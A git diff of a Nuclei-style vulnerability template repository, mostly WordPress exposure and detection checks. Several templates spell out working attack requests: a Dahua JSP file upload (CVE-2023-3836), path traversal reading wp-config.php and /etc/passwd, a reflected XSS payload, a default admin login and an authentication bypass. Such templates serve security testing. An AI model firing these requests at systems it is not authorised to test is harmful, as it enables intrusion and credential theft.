b/poc/web/zoho-webhook-token-11835.yaml @@ -3,7 +3,7 @@ info: name: Zoho Webhook Disclosure author: Ice3man severity: info - tags: exposure,token + tags: exposure,token,zoho requests: - method: GET path: diff --git a/poc/wordpress/alfacgiapi-wordpress-256.yaml b/poc/wordpress/alfacgiapi-wordpress-256.yaml index 271a1c4865..69b0d39f88 100644 --- a/poc/wordpress/alfacgiapi-wordpress-256.yaml +++ b/poc/wordpress/alfacgiapi-wordpress-256.yaml @@ -1,32 +1,30 @@ -id: alfacgiapi-wordpress - -info: - name: alfacgiapi - author: pussycat0x - severity: low - description: Searches for sensitive directories present in the ALFA_DATA. - reference: https://www.exploit-db.com/ghdb/6999 - tags: wordpress,listing - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-includes/ALFA_DATA/" - - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - type: word - words: - - "/wp-content/plugins/" - - "/wp-includes/ALFA_DATA/" - - "/ALFA_DATA/alfacgiapi/" - - "/cgi-bin/ALFA_DATA/alfacgiapi/" - condition: or - - type: status - status: - - 200 +id: alfacgiapi-wordpress +info: + name: alfacgiapi + author: pussycat0x + severity: low + description: Searches for sensitive directories present in the ALFA_DATA. + reference: https://www.exploit-db.com/ghdb/6999 + tags: wordpress,listing +requests: + - method: GET + path: + - "{{BaseURL}}/wp-includes/ALFA_DATA/" + - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" + - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" + - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - type: word + words: + - "/wp-content/plugins/" + - "/wp-includes/ALFA_DATA/" + - "/ALFA_DATA/alfacgiapi/" + - "/cgi-bin/ALFA_DATA/alfacgiapi/" + condition: or + - type: status + status: + - 200 diff --git a/poc/wordpress/alfacgiapi-wordpress.yaml b/poc/wordpress/alfacgiapi-wordpress.yaml deleted file mode 100644 index f8d61143d9..0000000000 --- a/poc/wordpress/alfacgiapi-wordpress.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: alfacgiapi-wordpress - -info: - name: alfacgiapi - author: pussycat0x - severity: low - description: Searches for sensitive directories present in the ALFA_DATA. - reference: https://www.exploit-db.com/ghdb/6999 - tags: wordpress,listing - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-includes/ALFA_DATA/" - - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" - - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - type: word - words: - - "/wp-content/plugins/" - - "/wp-includes/ALFA_DATA/" - - "/ALFA_DATA/alfacgiapi/" - - "/cgi-bin/ALFA_DATA/alfacgiapi/" - condition: or - - type: status - status: - - 200 diff --git a/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml b/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml index c7afb0444b..d9ab862ef2 100644 --- a/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml +++ b/poc/wordpress/dahua-wpms-addimgico-fileupload.yaml @@ -1,50 +1,68 @@ id: CVE-2023-3836 info: - name: 大华-WPMS-upload-addimgico - author: hufei - severity: high + name: Dahua Smart Park Management - Arbitrary File Upload + author: HuTa0 + severity: critical description: | - 大华 智慧园区综合管理平台 devicePoint_addImgIco 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限 + Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?. + remediation: | + Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability. reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/tree/main/docs/wiki/iot/%E5%A4%A7%E5%8D%8E + - https://github.com/qiuhuihk/cve/blob/main/upload.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-3836 + - https://vuldb.com/?ctiid.235162 + - https://vuldb.com/?id.235162 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-3836 + cwe-id: CWE-434 + epss-score: 0.03083 + epss-percentile: 0.89967 + cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* metadata: - max-request: 1 - fofa-query: app="大华-智慧园区综合管理平台" - hunter-query: app.name="Dahua 大华 智慧园区管理平台" verified: true + max-request: 2 + vendor: dahuasecurity + product: smart_parking_management + shodan-query: html:"/WPMS/asset" + zoomeye-query: /WPMS/asset + tags: cve,cve2023,dahua,fileupload,intrusive,rce +variables: + random_str: "{{rand_base(6)}}" + match_str: "{{md5(random_str)}}" http: - raw: - | POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1 + Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT Host: {{Hostname}} - User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_8 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/11.8w0575.0 Mobile/69G115 Safari/533.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 177 - Content-Type: multipart/form-data; boundary=e00b34d08d13639f8b619829b04c1a29 - --e00b34d08d13639f8b619829b04c1a29 - Content-Disposition: form-data; name="upload"; filename="test.jsp" - Content-Type: image/gif - - {{randstr}} - --e00b34d08d13639f8b619829b04c1a29-- + --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT + Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp" + Content-Type: application/octet-stream + Content-Transfer-Encoding: binary + {{match_str}} + --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT-- - | - GET /upload/emap/society_new/{{name}} HTTP/1.1 + GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1 Host: {{Hostname}} + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && status_code_2 == 200" + - "contains(body_2, '{{match_str}}')" + condition: and + extractors: - - type: json - name: name - json: - - ".data" + - type: regex + name: shell_filename internal: true - - matchers: - - type: word - words: - - '{{randstr}}' \ No newline at end of file + part: body_1 + regex: + - 'ico_res_(\w+)_on\.jsp' +# digest: 4b0a00483046022100f2fe66aae8a7930c251558f40e6a8761a1a2f08dc61ceb26fdb620340e407485022100b09958027468fc3a2c2e0713cd534f24ffcb47ccdbdc4fe72a231113cc9f634f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/wordpress/easy-wp-smtp-listing-7156.yaml b/poc/wordpress/easy-wp-smtp-listing-7156.yaml new file mode 100644 index 0000000000..4e6298c0c5 --- /dev/null +++ b/poc/wordpress/easy-wp-smtp-listing-7156.yaml @@ -0,0 +1,19 @@ +id: easy-wp-smtp-listing +info: + name: SMTP WP Plugin Directory listing enabled + author: PR3R00T + severity: high + description: The WordPress Easy WP SMTP Plugin has its 'easy-wp-smtp' folder remotely acccessible and its content available for access. + reference: https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/ + tags: wordpress,wp-plugin,smtp +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/" + matchers: + - type: word + words: + - "debug" + - "log" + - "Index of" + condition: and diff --git a/poc/wordpress/easy-wp-smtp-listing-7157.yaml b/poc/wordpress/easy-wp-smtp-listing-7157.yaml deleted file mode 100644 index 64937eb924..0000000000 --- a/poc/wordpress/easy-wp-smtp-listing-7157.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: easy-wp-smtp-listing - -info: - name: SMTP WP Plugin Directory listing enabled - author: PR3R00T - severity: high - description: The WordPress Easy WP SMTP Plugin has its 'easy-wp-smtp' folder remotely acccessible and its content available for access. - reference: https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/ - tags: wordpress,wp-plugin,smtp - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/" - matchers: - - type: word - words: - - "debug" - - "log" - - "Index of" - condition: and diff --git a/poc/wordpress/easy-wp-smtp-listing.yaml b/poc/wordpress/easy-wp-smtp-listing.yaml index 06955ae152..64937eb924 100644 --- a/poc/wordpress/easy-wp-smtp-listing.yaml +++ b/poc/wordpress/easy-wp-smtp-listing.yaml @@ -1,10 +1,13 @@ id: easy-wp-smtp-listing + info: name: SMTP WP Plugin Directory listing enabled author: PR3R00T severity: high + description: The WordPress Easy WP SMTP Plugin has its 'easy-wp-smtp' folder remotely acccessible and its content available for access. reference: https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/ - tags: wordpress,wp-plugin + tags: wordpress,wp-plugin,smtp + requests: - method: GET path: diff --git a/poc/wordpress/feedwordpress-xss-7459.yaml b/poc/wordpress/feedwordpress-xss-7459.yaml new file mode 100644 index 0000000000..6aab768ed3 --- /dev/null +++ b/poc/wordpress/feedwordpress-xss-7459.yaml @@ -0,0 +1,35 @@ +id: feedwordpress-xss +info: + name: FeedWordPress < 2022.0123 - Reflected Cross-Site Scripting (XSS) + author: dhiyaneshDk + severity: medium + description: The plugin is affected by a Reflected Cross-Site Scripting (XSS) within the "visibility" parameter. + reference: https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571 + tags: wordpress,wp-plugin,xss,feedwordpress,authenticated +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D2+onerror%3Dalert%28document.domain%29%3E HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '">" method="post">' + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/poc/wordpress/nativechurch-wp-theme-lfd-9001.yaml b/poc/wordpress/nativechurch-wp-theme-lfd-9001.yaml deleted file mode 100644 index 6f1dfbf9fe..0000000000 --- a/poc/wordpress/nativechurch-wp-theme-lfd-9001.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: nativechurch-wp-theme-lfd - -info: - name: WordPress NativeChurch Theme - Arbitrary File Retrieval - author: 0x_Akoko - severity: high - description: An arbitrary file retrieval vulnerability in the download.php file in the NativeChurch Theme allows attackers to download files from the system. - reference: - - https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html - tags: wordpress,wp-theme,lfi - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php' - - matchers-condition: and - matchers: - - type: word - words: - - "DB_NAME" - - "DB_PASSWORD" - - "DB_HOST" - - "The base configurations of the WordPress" - part: body - condition: and diff --git a/poc/wordpress/nativechurch-wp-theme-lfd-9002.yaml b/poc/wordpress/nativechurch-wp-theme-lfd-9002.yaml index b0e5093a12..5ce4bfe007 100644 --- a/poc/wordpress/nativechurch-wp-theme-lfd-9002.yaml +++ b/poc/wordpress/nativechurch-wp-theme-lfd-9002.yaml @@ -4,16 +4,12 @@ info: name: WordPress NativeChurch Theme - Local File Inclusion author: 0x_Akoko severity: high - description: | - WordPress NativeChurch Theme is vulnerable to local file inclusion in the download.php file. + description: WordPress NativeChurch Theme is vulnerable to local file inclusion in the download.php file. reference: - https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html - - https://wpscan.com/vulnerability/2e1062ed-0c48-473f-aab2-20ac9d4c72b1 - metadata: - max-request: 1 - tags: wp-theme,lfi,wp,packetstorm,wpscan,wordpress + tags: wordpress,wp-theme,lfi -http: +requests: - method: GET path: - '{{BaseURL}}/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php' @@ -21,12 +17,12 @@ http: matchers-condition: and matchers: - type: word - part: body words: - "DB_NAME" - "DB_PASSWORD" - "DB_HOST" - "The base configurations of the WordPress" + part: body condition: and -# digest: 4b0a00483046022100c6f65699021d81e0f72c6de7cc9196286f921143395769007b138c4f55a76c8e022100b5f3e2ee8c6be8e43d5b9c376435dd16f20c09a2dc755adf4d3ee7154432fff1:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/07/29 diff --git a/poc/wordpress/trilithic-viewpoint-default-10835.yaml b/poc/wordpress/trilithic-viewpoint-default-10835.yaml deleted file mode 100644 index d26dd6f456..0000000000 --- a/poc/wordpress/trilithic-viewpoint-default-10835.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: trilithic-viewpoint-default - -info: - name: Trilithic Viewpoint Default Login - author: davidmckennirey - severity: high - description: | - Searches for default admin credentials for the (discontinued) Trilithic Viewpoint application. - tags: default-login,trilithic,viewpoint - -requests: - - raw: - - | - POST /ViewPoint/admin/Site/ViewPointLogin HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - Cookie: trilithic_win_auth=false - - {u:"{{username}}", t:"undefined", p:"{{password}}", d:"", r:false, w:false} - - payloads: - username: - - admin - password: - - trilithic - attack: pitchfork - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - '"authorized":true' - - 'redirectUrl' - part: body - condition: and \ No newline at end of file diff --git a/poc/wordpress/viewpoint-system-status-11018.yaml b/poc/wordpress/viewpoint-system-status-11018.yaml index 7d0e87a274..30764c6e96 100644 --- a/poc/wordpress/viewpoint-system-status-11018.yaml +++ b/poc/wordpress/viewpoint-system-status-11018.yaml @@ -1,24 +1,20 @@ id: viewpoint-system-status - info: name: ViewPoint System Status author: dhiyaneshDK severity: low - metadata: - shodan-query: http.title:"ViewPoint System Status" + reference: + - https://www.shodan.io/search?query=http.title%3A%22ViewPoint+System+Status%22 tags: status,exposures,viewpoint - requests: - method: GET path: - '{{BaseURL}}' - matchers-condition: and matchers: - type: word words: - 'ViewPoint System Status' - - type: status status: - 200 diff --git a/poc/wordpress/viewpoint-system-status-11019.yaml b/poc/wordpress/viewpoint-system-status-11019.yaml deleted file mode 100644 index 93bf466527..0000000000 --- a/poc/wordpress/viewpoint-system-status-11019.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: viewpoint-system-status -info: - name: ViewPoint System Status - author: dhiyaneshDK - severity: low - metadata: - shodan-query: http.title:"ViewPoint System Status" - tags: status,exposures,viewpoint -requests: - - method: GET - path: - - '{{BaseURL}}' - matchers-condition: and - matchers: - - type: word - words: - - 'ViewPoint System Status' - - type: status - status: - - 200 diff --git a/poc/wordpress/wordpress-LFI.yaml b/poc/wordpress/wordpress-LFI.yaml index f4bde03529..aea478a3f7 100644 --- a/poc/wordpress/wordpress-LFI.yaml +++ b/poc/wordpress/wordpress-LFI.yaml @@ -1,10 +1,8 @@ id: wordpress-LFI - info: name: wordpress-LFI author: 0x240x23elu severity: High - requests: - method: GET path: @@ -16,10 +14,8 @@ requests: - "{{BaseURL}}/wordpress/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00" - "{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd" - "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd" - - matchers: - type: regex regex: - "root:[x*]:0:0:" - part: body \ No newline at end of file + part: body diff --git a/poc/wordpress/wordpress-accessible-wpconfig-11235.yaml b/poc/wordpress/wordpress-accessible-wpconfig-11235.yaml deleted file mode 100644 index 4419af6656..0000000000 --- a/poc/wordpress/wordpress-accessible-wpconfig-11235.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: wordpress-accessible-wpconfig -info: - name: WordPress accessible wp-config - author: Kiblyn11 & zomsop82 & madrobot & geeknik & daffainfo - severity: high - tags: wordpress,backups -requests: - - method: GET - path: - - '{{BaseURL}}/wp-config.php' - - '{{BaseURL}}/.wp-config.php.swp' - - '{{BaseURL}}/wp-config-sample.php' - - '{{BaseURL}}/wp-config.inc' - - '{{BaseURL}}/wp-config.old' - - '{{BaseURL}}/wp-config.txt' - - '{{BaseURL}}/wp-config.php.txt' - - '{{BaseURL}}/wp-config.php.bak' - - '{{BaseURL}}/wp-config.php.old' - - '{{BaseURL}}/wp-config.php.dist' - - '{{BaseURL}}/wp-config.php.inc' - - '{{BaseURL}}/wp-config.php.swp' - - '{{BaseURL}}/wp-config.php.html' - - '{{BaseURL}}/wp-config-backup.txt' - - '{{BaseURL}}/wp-config.php.save' - - '{{BaseURL}}/wp-config.php~' - - '{{BaseURL}}/wp-config.php.orig' - - '{{BaseURL}}/wp-config.php.original' - - '{{BaseURL}}/_wpeprivate/config.json' - matchers-condition: and - matchers: - - type: word - words: - - DB_NAME - - WPENGINE_ACCOUNT - part: body - - type: status - status: - - 200 diff --git a/poc/wordpress/wordpress-accessible-wpconfig-11238.yaml b/poc/wordpress/wordpress-accessible-wpconfig-11238.yaml index c6cdd244de..f7c496190b 100644 --- a/poc/wordpress/wordpress-accessible-wpconfig-11238.yaml +++ b/poc/wordpress/wordpress-accessible-wpconfig-11238.yaml @@ -1,9 +1,10 @@ id: wordpress-accessible-wpconfig info: name: WordPress accessible wp-config - author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo + author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n severity: high - tags: wordpress,backups + description: The remote WordPress installation has the `wp-config` file remotely accessible and its content available for reading. + tags: wordpress,backup requests: - method: GET path: @@ -23,16 +24,19 @@ requests: - '{{BaseURL}}/wp-config-backup.txt' - '{{BaseURL}}/wp-config.php.save' - '{{BaseURL}}/wp-config.php~' + - '{{BaseURL}}/wp-config.php-backup' - '{{BaseURL}}/wp-config.php.orig' - '{{BaseURL}}/wp-config.php.original' - '{{BaseURL}}/_wpeprivate/config.json' + stop-at-first-match: true matchers-condition: and matchers: - type: word words: - - DB_NAME - - WPENGINE_ACCOUNT + - "DB_NAME" + - "DB_PASSWORD" part: body + condition: and - type: status status: - 200 diff --git a/poc/wordpress/wordpress-affiliatewp-log-11240.yaml b/poc/wordpress/wordpress-affiliatewp-log-11240.yaml deleted file mode 100644 index 6c7366d644..0000000000 --- a/poc/wordpress/wordpress-affiliatewp-log-11240.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: wordpress-affiliatewp-log -info: - name: WordPress Plugin "AffiliateWP – Allowed Products" Log Disclosure - author: dhiyaneshDK - severity: low - tags: wordpress,log,plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/uploads/affwp-debug.log' - matchers-condition: and - matchers: - - type: word - words: - - 'Referral could not be retrieved' - - 'Affiliate CSV' - - type: word - words: - - 'text/plain' - part: header - - type: status - status: - - 200 diff --git a/poc/wordpress/wordpress-affiliatewp-log-11242.yaml b/poc/wordpress/wordpress-affiliatewp-log-11242.yaml new file mode 100644 index 0000000000..ecacdbc600 --- /dev/null +++ b/poc/wordpress/wordpress-affiliatewp-log-11242.yaml @@ -0,0 +1,23 @@ +id: wordpress-affiliatewp-log +info: + name: WordPress Plugin "AffiliateWP -- Allowed Products" Log Disclosure + author: dhiyaneshDK + severity: low + tags: wordpress,log,plugin +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/uploads/affwp-debug.log' + matchers-condition: and + matchers: + - type: word + words: + - 'Referral could not be retrieved' + - 'Affiliate CSV' + - type: word + words: + - 'text/plain' + part: header + - type: status + status: + - 200 diff --git a/poc/wordpress/wordpress-affiliatewp-log.yaml b/poc/wordpress/wordpress-affiliatewp-log.yaml index ecacdbc600..198fea56a0 100644 --- a/poc/wordpress/wordpress-affiliatewp-log.yaml +++ b/poc/wordpress/wordpress-affiliatewp-log.yaml @@ -1,23 +1,32 @@ id: wordpress-affiliatewp-log + info: name: WordPress Plugin "AffiliateWP -- Allowed Products" Log Disclosure author: dhiyaneshDK severity: low + metadata: + max-request: 1 tags: wordpress,log,plugin -requests: + +http: - method: GET path: - '{{BaseURL}}/wp-content/uploads/affwp-debug.log' + matchers-condition: and matchers: - type: word words: - 'Referral could not be retrieved' - 'Affiliate CSV' + - type: word words: - 'text/plain' part: header + - type: status status: - 200 + +# digest: 4a0a00473045022011ac29125549f3934e82e0a00962160e2d29f294113cd751c599745530d9f526022100bcdc1d72d1dde78dfbbc184a40a33d9ff8a126f8b9971395c576afc0f9ca855c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wordpress-bbpress-plugin-listing-11245.yaml b/poc/wordpress/wordpress-bbpress-plugin-listing-11245.yaml index a392e5f104..4f8b9df7f6 100644 --- a/poc/wordpress/wordpress-bbpress-plugin-listing-11245.yaml +++ b/poc/wordpress/wordpress-bbpress-plugin-listing-11245.yaml @@ -4,8 +4,7 @@ info: author: dhiyaneshDK severity: info description: Searches for sensitive directories present in the bbpress wordpress plugin. - reference: - - https://www.exploit-db.com/ghdb/6158 + reference: https://www.exploit-db.com/ghdb/6158 tags: wordpress,listing,plugin requests: - method: GET diff --git a/poc/wordpress/wordpress-bbpress-plugin-listing.yaml b/poc/wordpress/wordpress-bbpress-plugin-listing.yaml new file mode 100644 index 0000000000..a392e5f104 --- /dev/null +++ b/poc/wordpress/wordpress-bbpress-plugin-listing.yaml @@ -0,0 +1,23 @@ +id: wordpress-bbpress-plugin-listing +info: + name: WordPress bbPress Plugin Directory Listing + author: dhiyaneshDK + severity: info + description: Searches for sensitive directories present in the bbpress wordpress plugin. + reference: + - https://www.exploit-db.com/ghdb/6158 + tags: wordpress,listing,plugin +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/bbpress/" + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - "/wp-content/plugins/bbpress/" + condition: and + - type: status + status: + - 200 diff --git a/poc/wordpress/wordpress-db-repair-11252.yaml b/poc/wordpress/wordpress-db-repair-11252.yaml new file mode 100644 index 0000000000..bdf47722c3 --- /dev/null +++ b/poc/wordpress/wordpress-db-repair-11252.yaml @@ -0,0 +1,35 @@ +id: wordpress-db-repair + +info: + name: Wordpress DB Repair Exposed + author: _C0wb0y_ + severity: low + description: Discover enabled Wordpress repair page. + metadata: + max-request: 1 + tags: wordpress,config,fpd + +http: + - method: GET + path: + - "{{BaseURL}}/wp-admin/maint/repair.php" + + matchers-condition: and + matchers: + - type: word + words: + - "WordPress" + + - type: status + status: + - 200 + + - type: word + words: + - "define" + - "WP_ALLOW_REPAIR" + - "true" + condition: and + negative: true + +# digest: 490a00463044022048d52e9a4f94a9d08c7365eca151825c702b06a113a6578821bb2b4f8ee6c7b60220509b242a3221080dd28182942490019a961481aac6c8cd8352263b8562d5b356:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wordpress-debug-log-11258.yaml b/poc/wordpress/wordpress-debug-log-11259.yaml similarity index 100% rename from poc/wordpress/wordpress-debug-log-11258.yaml rename to poc/wordpress/wordpress-debug-log-11259.yaml diff --git a/poc/wordpress/wordpress-detect-11261.yaml b/poc/wordpress/wordpress-detect-11260.yaml similarity index 100% rename from poc/wordpress/wordpress-detect-11261.yaml rename to poc/wordpress/wordpress-detect-11260.yaml diff --git a/poc/wordpress/wordpress-detect.yaml b/poc/wordpress/wordpress-detect.yaml index bf419a8314..1bb03114d3 100644 --- a/poc/wordpress/wordpress-detect.yaml +++ b/poc/wordpress/wordpress-detect.yaml @@ -1,65 +1,34 @@ id: wordpress-detect - info: - name: WordPress Detect - author: pdteam,daffainfo,ricardomaia,topscoder,AdamCrosser + name: WordPress Detection + author: pdteam severity: info metadata: - verified: true - max-request: 4 - vendor: wordpress - product: wordpress shodan-query: http.component:"WordPress" - category: cms - tags: tech,wordpress,cms,wp - -http: + tags: tech,wordpress +requests: - method: GET path: - "{{BaseURL}}" - - "{{BaseURL}}/wp-admin/install.php" - - "{{BaseURL}}/feed/" - - "{{BaseURL}}/?feed=rss2" # alternative if /feed/ is blocked - redirects: true max-redirects: 2 - stop-at-first-match: true - - matchers-condition: and + matchers-condition: or matchers: - type: regex regex: - - '<generator>https?:\/\/wordpress\.org.*</generator>' - - 'wp-login.php' - - '\/wp-content/themes\/' - - '\/wp-includes\/' - - 'name="generator" content="wordpress' - '<link[^>]+s\d+\.wp\.com' - '<!-- This site is optimized with the Yoast (?:WordPress )?SEO plugin v([\d.]+) -' - '<!--[^>]+WP-Super-Cache' condition: or - - - type: status - status: - - 200 - + - type: word + words: + - '/wp-content/themes/' + - '/wp-includes/' + - 'name="generator" content="wordpress' + - '<!-- performance optimized by w3 total cache. learn more: http://www.w3-edge.com/wordpress-plugins/' + condition: or extractors: - type: regex - name: version_by_generator - group: 1 - regex: - - '(?m)https:\/\/wordpress.org\/\?v=([0-9.]+)' - - - type: regex - name: version_by_js - group: 1 - regex: - - 'wp-emoji-release\.min\.js\?ver=((\d+\.?)+)\b' - - - type: regex - name: version_by_css group: 1 regex: - - 'install\.min\.css\?ver=((\d+\.?)+)\b' - -# digest: 4a0a00473045022063a1eb3686edc8dfada91893ca54db0bb002e131cca2a373d56b39c69e46b5440221009004f9bb9c3168e5bdacea0aed03100ce640ecaa2afb4bb3b64a3e545ef1fbcb:922c64590222798bb761d5b6d8e72950 + - 'content="WordPress ([0-9.]+)"' diff --git a/poc/wordpress/wordpress-directory-listing-11266.yaml b/poc/wordpress/wordpress-directory-listing-11266.yaml index fd0ec7d30e..0e719cc724 100644 --- a/poc/wordpress/wordpress-directory-listing-11266.yaml +++ b/poc/wordpress/wordpress-directory-listing-11266.yaml @@ -1,25 +1,17 @@ id: wordpress-directory-listing - info: name: Wordpress directory listing author: Manas_Harsh severity: info - tags: wordpress - requests: - method: GET path: - "{{BaseURL}}/wp-content/uploads/" - - "{{BaseURL}}/wp-content/themes/" - - "{{BaseURL}}/wp-content/plugins/" - - "{{BaseURL}}/wp-includes/" - matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - - "Index of /" + - Index of /wp-content/uploads diff --git a/poc/wordpress/wordpress-emails-verification-for-woocommerce-11271.yaml b/poc/wordpress/wordpress-emails-verification-for-woocommerce-11271.yaml index a67ac9a187..a2d52041ec 100644 --- a/poc/wordpress/wordpress-emails-verification-for-woocommerce-11271.yaml +++ b/poc/wordpress/wordpress-emails-verification-for-woocommerce-11271.yaml @@ -1,25 +1,24 @@ id: wp-woocommerce-email-verification info: - name: wordpress-emails-verification-for-woocommerce - author: random-robbie + name: WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass + author: random_robbie severity: critical - tags: wordpress,wp-plugin - description: Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass reference: https://wpvulndb.com/vulnerabilities/10318 - # GDPR plugin may give a false positive so double check headers + tags: wordpress,wp-plugin,woocommerce requests: - method: GET path: - "{{BaseURL}}/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=" - "{{BaseURL}}/blog/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=" + stop-at-first-match: true matchers-condition: and matchers: - - type: word - words: - - "wordpress_logged_in" + - type: regex part: header - - type: status - status: - - 401 - - 403 - negative: true + regex: + - "wordpress_logged_in_[a-z0-9]{32}" + - type: dsl + dsl: + - 'status_code != 401' + - 'status_code != 403' + condition: or diff --git a/poc/wordpress/wordpress-emergency-script-11272.yaml b/poc/wordpress/wordpress-emergency-script-11272.yaml deleted file mode 100644 index 40258b1a9d..0000000000 --- a/poc/wordpress/wordpress-emergency-script-11272.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: wordpress-emergency-script -info: - name: WordPress Emergency Script - author: dwisiswant0 - severity: info - tags: wordpress - # Ref:- - # https://wordpress.org/support/article/resetting-your-password/#using-the-emergency-password-reset-script -requests: - - method: GET - path: - - "{{BaseURL}}/emergency.php" - matchers-condition: and - matchers: - - type: word - words: - - "Your use of this script is at your sole risk" - - "WordPress Administrator" - - "Update Options" - condition: and - part: body - - type: status - status: - - 200 diff --git a/poc/wordpress/wordpress-emergency-script-11275.yaml b/poc/wordpress/wordpress-emergency-script-11275.yaml new file mode 100644 index 0000000000..3d2a37fc3d --- /dev/null +++ b/poc/wordpress/wordpress-emergency-script-11275.yaml @@ -0,0 +1,24 @@ +id: wordpress-emergency-script +info: + name: WordPress Emergency Script + author: dwisiswant0 + severity: info + tags: wordpress + # Ref:- + reference: https://wordpress.org/support/article/resetting-your-password/#using-the-emergency-password-reset-script +requests: + - method: GET + path: + - "{{BaseURL}}/emergency.php" + matchers-condition: and + matchers: + - type: word + words: + - "Your use of this script is at your sole risk" + - "WordPress Administrator" + - "Update Options" + condition: and + part: body + - type: status + status: + - 200 diff --git a/poc/wordpress/wordpress-emergency-script-11277.yaml b/poc/wordpress/wordpress-emergency-script-11277.yaml index 3d2a37fc3d..b575cc4a57 100644 --- a/poc/wordpress/wordpress-emergency-script-11277.yaml +++ b/poc/wordpress/wordpress-emergency-script-11277.yaml @@ -1,15 +1,17 @@ id: wordpress-emergency-script + info: name: WordPress Emergency Script author: dwisiswant0 severity: info tags: wordpress - # Ref:- reference: https://wordpress.org/support/article/resetting-your-password/#using-the-emergency-password-reset-script + requests: - method: GET path: - "{{BaseURL}}/emergency.php" + matchers-condition: and matchers: - type: word @@ -21,4 +23,4 @@ requests: part: body - type: status status: - - 